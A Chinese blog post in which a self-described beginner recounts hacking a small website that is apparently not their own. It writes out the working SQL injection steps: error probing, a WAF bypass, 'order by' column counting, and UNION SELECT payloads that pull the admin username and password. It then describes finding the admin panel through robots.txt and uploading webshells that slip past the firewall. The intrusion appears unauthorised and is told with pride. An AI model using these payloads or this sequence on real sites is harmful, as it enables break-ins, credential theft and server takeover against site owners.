您的位置:首页 > 其它

【萌新】记录一次渗透小站的过程

2017-09-07 21:03 281 查看
一开始接触该站



先随便翻阅了一些目录

发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目

于是 二话不说 看看有没有注入点

输入一个  '  看一看  发现报错了!!!



然后惯例 and 1=1, and 1=11



发现存在云锁   突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧!

云锁sql注入绕过漏洞

从这里我们发现一个绕过的漏洞

直接用firefox的hackerbar试试吧!





存在注入点! 那么继续手注吧!

构造语句:ProductView.asp?ID=1021 order by 30 发现 30不报错 31报错 那么有30的字段





继续构造注入语句 :ProductView.asp?ID=1021UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin

发现直接爆了出来



然后

ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,username,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin

ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin

运气不错 直接username password就试了出来

那么找下后台吧!

发现用了御剑 死都扫不出来

换个思路看看 robots.txt



试着试着 找到了 后台

不愧是天选之人

感觉都满顺利的

进入后台直接修改图片



发现可以直接上传sap文件 美滋滋、

上传了几个马子 发现都被云锁拦截了 最后快要放弃的时候 上传一个发现神奇的过了!



接下来发现想Net下 都不行 还是个菜鸡一个啊 还要继续学习

未完待续
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: